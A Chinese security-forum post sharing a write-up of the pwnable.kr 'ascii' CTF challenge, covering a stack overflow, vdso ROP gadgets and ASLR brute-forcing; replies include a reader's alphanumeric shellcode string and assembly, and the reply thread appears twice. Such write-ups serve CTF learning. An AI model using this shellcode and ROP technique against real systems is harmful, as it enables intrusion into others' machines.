[原创]pwnable.kr 之 ascii 解题思路分享-Pwn-看雪-安全社区|安全招聘|kanxue.com

[原创]pwnable.kr 之 ascii 解题思路分享

2017-12-21 22:55 12215

[原创]pwnable.kr 之 ascii 解题思路分享

OxLucifer

2017-12-21 22:55

12215

今天突然发现看雪多了一个pwn的版块，于是想把自己前段时间刚做的一道题拿出来和大家分享，也支持一下新版块：）大牛还请轻拍~

题目为pwnable.kr的ascii，难度为Grotesque

首先看一下IDA对main函数的反汇编结果：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  _BYTE *v3; // ebx
  char v5; // [esp+4h] [ebp-30h]
  int v6; // [esp+28h] [ebp-Ch]
  unsigned int v7; // [esp+2Ch] [ebp-8h]

  v6 = mmap(0x80000000, 4096, 7, 50, 0xFFFFFFFF, 0);
  if ( v6 != 0x80000000 )
  {
    puts("mmap failed. tell admin");
    exit(1);
  }
  printf("Input text : ", v5);
  v7 = 0;
  do
  {
    if ( v7 > 399 )
      break;
    v3 = (_BYTE *)(v6 + v7);
    *v3 = getchar();
    ++v7;
  }
  while ( is_ascii((char)*v3) );
  puts("triggering bug...");
  return vuln();
}

main函数大致做了这么几件事：

1、mmap了一块堆内存，起始地址为0x80000000，用于保存从stdin读入用户输入的内容

2、对用户输入的字符串内容检查：用户输入的每个字符都应该为可见字符（否则就截断字符串），即ASCII值范围为[ 0x20 , 0x7E ]

3、对用户输入的字符串长度检查：长度应小于400（这点其实对本题影响不大）

4、调用vuln函数，将用户输入的内容（保存于0x80000000）复制到vuln函数的本地变量上面，从而造成栈溢出

检查一下binary的各种安全参数，情况如下：

[*] '/home/zero/Desktop/ascii/ascii'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

而且由于最终该binary是要在服务端运行的，而服务端又开启了ASLR，所以vdso段是随机化的。

该题目网上已经有公开的解决方法，但是该公开方法已经无效，所以在这里我写一下如果想用新的方法需要注意的点：

问题1、网上公开的那种ROP方式已经不能再用，因为需要从vdso段中获取的ROP Gadget地址和内容都发生了变化，所以ROP Gadget是需要变化的

问题2、公开方法中提到的使用"ulimit -s unlimited"(CVE-2016-3672)漏洞方式使vdso基地址固定，然后再用硬编码的方式将ROP Gadget通过栈溢出写入栈中，但是pwnable.kr已经修补了该漏洞，所以用这种方式固定vdso段地址也失效了

问题1比较好解决，因为是vdso段的信息发生了变化导致了Gadget信息也发生了改变，所以只要再从现在的vdso中重新查询可利用的Gadget即可（这里有一个扣题ascii的小坑，留给大家自己做一遍发现，嘿嘿），只要具体的ROP Chain大家可以自己去动手构造，并不难：）

我最终使用的两条ROP Gadget分别为0xC75和0xC78：

gdb-peda$ vmmap vdso
Start      End        Perm	Name
0x555fa000 0x555fc000 r-xp	[vdso]
gdb-peda$ x/3i 0x555fa000+0xc75
   0x555fac75 <__vdso_time+37>:	pop    ebx
   0x555fac76 <__vdso_time+38>:	pop    ebp
   0x555fac77 <__vdso_time+39>:	ret    
gdb-peda$ x/2i 0x555fa000+0xc78
   0x555fac78:	mov    eax,DWORD PTR [esp]
   0x555fac7b:	ret    
gdb-peda$

问题2是本道题目的解决关键，我在解决的时候实际上只要一直爆破就可以了

当然本题的一个重要考察点为Alphanumeric Encode，这点网上已经有很多文章介绍，所以这里不再赘述。

考虑到pwnable.kr官网的要求（Rules & Tips中的第3点），所以在这里我不会提供Solver的源码。

其实这道题写出Solver并不难，自己动手做出来才是真的懂，对吧：）

贴一张我最后解决该问题的截图，实测我最少需要爆破10+次，最多需要爆破300+次即可爆破成功。

附：网上公开的解决方法（公开方法中的exp如果直接使用应该是失效的，但是可以作为参考）：

1、http://www.mottoin.com/87792.html

2、http://www.lovekira.cn/?p=340

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界

收藏・3

点赞・2

打赏

最新回复 (4)
Assassin刺客雪币： 219 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	Assassin刺客 2019-1-12 15:01 2 楼 0 我做ascii这个题目有一段时间了，思路呢感觉差不多。先是用ulimit -s unlimited固定vdso地址，我经过统计发现确实可能出现重复的地址段。然后我利用网上那个日本人的shellcode，将值传到eax，我自己写了一个汇编代码 push 0x30 pop eax xor al, 0x30 push eax push eax push eax push eax push eax push eax popad dec edx push edx pop eax xor eax, 0x33505067 xor eax, 0x4c505042 push eax push esp pop ecx xor [ecx], dh inc ecx xor [ecx], dh inc ecx xor [ecx], dh pop eax 共37字节然后利用那个shellcode，135字节。根据vuln函数，覆盖的地址是esp+10的位置，那么正好37+135=0xb8+4-0x10. 然后构造ROP链，直接利用一个0x55557c78 : mov eax, dword ptr [esp] ; ret 即可最后构造shellcode为 shellcode = "j0X40PPPPPPaJRX5gPP35BPPLPTY01A01A01X" shellcode += "PYj0X40PPPPQPaJRX4Dj0YIIIII0DN0RX502A05r9sOPTY01A01RX500D05cFZBPTY01SX540D05ZFXbPTYA01A01SX50A005XnRYPSX5AA005nnCXPSX5AA005plbXPTYA01Tx" shellcode += p32(0x55557c78)*11 但是我尝试还是不可以，请问我得思路有什么问题嘛？如若指正不胜感激！我得QQ是2814207439，谢谢了！
OxLucifer 雪币： 22 活跃值： (851) 能力值： ( LV8，RANK：135 ) 在线值：发帖 5 回帖 26 粉丝 7 关注私信	OxLucifer 2 2019-1-14 09:57 3 楼 0 Assassin刺客我做ascii这个题目有一段时间了，思路呢感觉差不多。先是用ulimit -s unlimited固定vdso地址，我经过统计发现确实可能出现重复的地址段。然后我利用网上那个日本人的shell ... 这个题我很久以前做过的了，所以细节上记得不太多了。不过还有以下几点，希望能帮到你： 1、我刚又运行了一下我之前写的解题脚本，依然可以得到flag，所以我的解题思路还是可用的； 2、我记得我的shellcode是我用Metasploit生成的，但是生成后还是需要手动微调，这个你可以试试在GDB里手动调试修改，应该在Metasploit生成的shellcode上加几个字节就OK 3、在本地测试的时候可以关掉ASLR测试，然后再到真实环境爆破（这点我估计你也想到了）
茶隼雪币： 209 活跃值： (13) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 3 粉丝 0 关注私信	茶隼 2019-3-20 15:01 4 楼 0 你好，我在做这题的时候，发现已经没有可以使用ascii码字符表示的可执行段了： gdb-peda$ vmmap Start End Perm Name 0x08048000 0x080ed000 r-xp /zwork/pwnable/ascii/ascii 0x080ed000 0x080ef000 rw-p /zwork/pwnable/ascii/ascii 0x080ef000 0x08113000 rw-p [heap] 0x80000000 0x80001000 rwxp mapped 0xf7ff8000 0xf7ffa000 rw-p mapped 0xf7ffa000 0xf7ffc000 r--p [vvar] 0xf7ffc000 0xf7ffe000 r-xp [vdso] 0xfffdd000 0xffffe000 rw-p [stack] 试了很多次依然如此。这种情况是否是环境出了问题？
OxLucifer 雪币： 22 活跃值： (851) 能力值： ( LV8，RANK：135 ) 在线值：发帖 5 回帖 26 粉丝 7 关注私信	OxLucifer 2 2019-3-20 15:43 5 楼 0 茶隼你好，我在做这题的时候，发现已经没有可以使用ascii码字符表示的可执行段了： gdb-peda$ vmmap Start End Perm Name 0x08048000 0x080ed000 ... 我刚又试了一下我之前写的solve，还是可以得到flag。具体细节我已经记不太清了，可以参考我3楼的回答。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

OxLucifer

发帖

回帖

135

RANK

关注

私信

他的文章

[原创]Linux内核漏洞调试环境搭建的经验分享

[原创]用IOS12的捷径功能实现一键运行Linux脚本

[原创]用VBoxDbg调试并理解单线程版脏牛（CVE-2016-5195）

[原创]Computer.Systems.A.Programmer.s.Perspective.2nd.个人笔记版

关于我们

联系我们

企业服务

看雪公众号

最新回复 (4)
Assassin刺客雪币： 219 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	Assassin刺客 2019-1-12 15:01 2 楼 0 我做ascii这个题目有一段时间了，思路呢感觉差不多。先是用ulimit -s unlimited固定vdso地址，我经过统计发现确实可能出现重复的地址段。然后我利用网上那个日本人的shellcode，将值传到eax，我自己写了一个汇编代码 push 0x30 pop eax xor al, 0x30 push eax push eax push eax push eax push eax push eax popad dec edx push edx pop eax xor eax, 0x33505067 xor eax, 0x4c505042 push eax push esp pop ecx xor [ecx], dh inc ecx xor [ecx], dh inc ecx xor [ecx], dh pop eax 共37字节然后利用那个shellcode，135字节。根据vuln函数，覆盖的地址是esp+10的位置，那么正好37+135=0xb8+4-0x10. 然后构造ROP链，直接利用一个0x55557c78 : mov eax, dword ptr [esp] ; ret 即可最后构造shellcode为 shellcode = "j0X40PPPPPPaJRX5gPP35BPPLPTY01A01A01X" shellcode += "PYj0X40PPPPQPaJRX4Dj0YIIIII0DN0RX502A05r9sOPTY01A01RX500D05cFZBPTY01SX540D05ZFXbPTYA01A01SX50A005XnRYPSX5AA005nnCXPSX5AA005plbXPTYA01Tx" shellcode += p32(0x55557c78)*11 但是我尝试还是不可以，请问我得思路有什么问题嘛？如若指正不胜感激！我得QQ是2814207439，谢谢了！
OxLucifer 雪币： 22 活跃值： (851) 能力值： ( LV8，RANK：135 ) 在线值：发帖 5 回帖 26 粉丝 7 关注私信	OxLucifer 2 2019-1-14 09:57 3 楼 0 Assassin刺客我做ascii这个题目有一段时间了，思路呢感觉差不多。先是用ulimit -s unlimited固定vdso地址，我经过统计发现确实可能出现重复的地址段。然后我利用网上那个日本人的shell ... 这个题我很久以前做过的了，所以细节上记得不太多了。不过还有以下几点，希望能帮到你： 1、我刚又运行了一下我之前写的解题脚本，依然可以得到flag，所以我的解题思路还是可用的； 2、我记得我的shellcode是我用Metasploit生成的，但是生成后还是需要手动微调，这个你可以试试在GDB里手动调试修改，应该在Metasploit生成的shellcode上加几个字节就OK 3、在本地测试的时候可以关掉ASLR测试，然后再到真实环境爆破（这点我估计你也想到了）
茶隼雪币： 209 活跃值： (13) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 3 粉丝 0 关注私信	茶隼 2019-3-20 15:01 4 楼 0 你好，我在做这题的时候，发现已经没有可以使用ascii码字符表示的可执行段了： gdb-peda$ vmmap Start End Perm Name 0x08048000 0x080ed000 r-xp /zwork/pwnable/ascii/ascii 0x080ed000 0x080ef000 rw-p /zwork/pwnable/ascii/ascii 0x080ef000 0x08113000 rw-p [heap] 0x80000000 0x80001000 rwxp mapped 0xf7ff8000 0xf7ffa000 rw-p mapped 0xf7ffa000 0xf7ffc000 r--p [vvar] 0xf7ffc000 0xf7ffe000 r-xp [vdso] 0xfffdd000 0xffffe000 rw-p [stack] 试了很多次依然如此。这种情况是否是环境出了问题？
OxLucifer 雪币： 22 活跃值： (851) 能力值： ( LV8，RANK：135 ) 在线值：发帖 5 回帖 26 粉丝 7 关注私信	OxLucifer 2 2019-3-20 15:43 5 楼 0 茶隼你好，我在做这题的时候，发现已经没有可以使用ascii码字符表示的可执行段了： gdb-peda$ vmmap Start End Perm Name 0x08048000 0x080ed000 ... 我刚又试了一下我之前写的solve，还是可以得到flag。具体细节我已经记不太清了，可以参考我3楼的回答。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复